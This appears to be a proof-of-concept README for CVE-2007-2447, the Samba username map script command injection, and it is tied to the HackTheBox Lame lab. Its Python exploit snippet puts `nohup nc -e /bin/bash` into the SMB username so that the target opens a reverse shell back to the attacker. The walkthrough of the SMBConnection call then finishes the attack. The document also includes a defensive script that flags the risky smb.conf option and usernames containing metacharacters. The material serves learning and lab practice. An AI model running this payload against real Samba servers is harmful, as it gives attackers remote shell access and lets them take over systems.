
CVE-2007-2447 PoC — Samba MS-RPC Shell Command Injection Vulnerability

Associated Vulnerability
Title: Samba MS-RPC Shell Command Injection Vulnerability (CVE-2007-2447)
Description: The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
Readme
# ExploitDev Journey #6 | CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username map script' Command Execution
Original Exploit: https://www.exploit-db.com/exploits/16320 <br>


**Exploit name:** Samba username map script RCE <br>
**CVE**: 2007-2447 <br>
**Lab**: Lame - HackTheBox


### Description
There is a vulnerability in Samba versions below 3.0.25 that allows an attacker to execute system commands by sending a malformed request, with the command placed in the username, to the SMB server.

<br>

### How it works
Here is an example of using the `nohup` command to create a directory:
<img src="https://i.ibb.co/4WCvK6S/lame1.png">

Programmatically speaking, `/=` is the divide-and-assign operator, usually used in loops. So why do we need it here? <br>
Here it is used to divide the domain field from the username field when the request is sent; a better explanation can be found [here](https://0x00sec.org/t/cvexplained-cve-2007-2447/22748).
We use the username field to open a netcat connection and connect to our server.
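
Seen from the defender's side, both conditions described above can be checked directly: whether `username map script` is set in `smb.conf`, and whether a username seen in authentication logs carries shell metacharacters. The following is an added example, not part of the original README or exploit; the sample config, the script path, the account names and the choice of metacharacters are constructed assumptions.

```python
import re

# Characters that start command substitution or chaining in a shell.
# '\' and a trailing '$' are left out: DOMAIN\user and MACHINE$ are legitimate.
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(")

def map_script_settings(conf_text):
    """Return (section, value) for every non-empty 'username map script'."""
    found, section, pending = [], "global", ""
    for raw in conf_text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):          # smb.conf line continuation
            pending = line[:-1]
            continue
        pending = ""
        if not line or line[0] in "#;":  # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        name, sep, value = line.partition("=")
        # smb.conf ignores case and whitespace inside parameter names
        if sep and re.sub(r"\s+", "", name).lower() == "usernamemapscript":
            if value.strip():
                found.append((section, value.strip()))
    return found

def suspicious_usernames(names):
    """Return the names that contain shell metacharacters."""
    return [n for n in names if SHELL_META.search(n)]

# Constructed sample input, not taken from a real host.
SAMPLE_CONF = """\
[global]
   workgroup = LAB
   ; username map script = /bin/false
   Username Map Script = /etc/samba/scripts/mapusers.sh
[share]
   path = /srv/share
"""
SAMPLE_NAMES = ["alice", "LAB\\bob", "/=`nohup true`", "svc_backup$"]

if __name__ == "__main__":
    print(map_script_settings(SAMPLE_CONF))
    print(suspicious_usernames(SAMPLE_NAMES))
```

A non-empty result from `map_script_settings` on a Samba release in the affected range (3.0.0 through 3.0.25rc3, per the CVE description) means the host needs the option removed or Samba upgraded.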

<br>

### Writing the exploit
Writing the exploit is very easy because there is already an SMB client library available for Python (install the `python3-samba` package), so all you have to do is use it like this:
```py
username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username, '', '', '')

try:
    print("Sending payload")
    conn.connect(rhost, rport, timeout=10)
except Exception as e:
    sys.exit(e)

```

Let's understand how `SMBConnection` works. I provided the `username`, but what are the 3 other empty strings? <br>
Those 3 other arguments are `password`, `my_name` and `remote_name`.

To make our exploit easier to read, we can write the arguments out explicitly along with their values, although the values for the arguments after `username` are not required:
```py
conn = SMBConnection(username=username, password='', my_name='', remote_name='')
```

The following part is easier to understand: we use the instance of the `SMBConnection` class to make a connection, and we provide the target's IP, the port and a timeout in seconds:
```py
conn.connect(rhost, rport, timeout=10)
```

<br>

### Final thoughts
In this exploit development session you learned about creating an SMB client and connecting to an SMB server. You also learned about Linux commands such as `nohup`, which you can experiment with later. You learned about connecting to your attacker machine from the victim machine using netcat, which is something that might come in useful in your exploit development journey.
File Snapshot

[4.0K] /data/pocs/66bf1b2bf49dcdaed3af7074a0293e7a6bc495f7
├── [ 705] exploit.py
└── [2.5K] README.md
0 directories, 2 files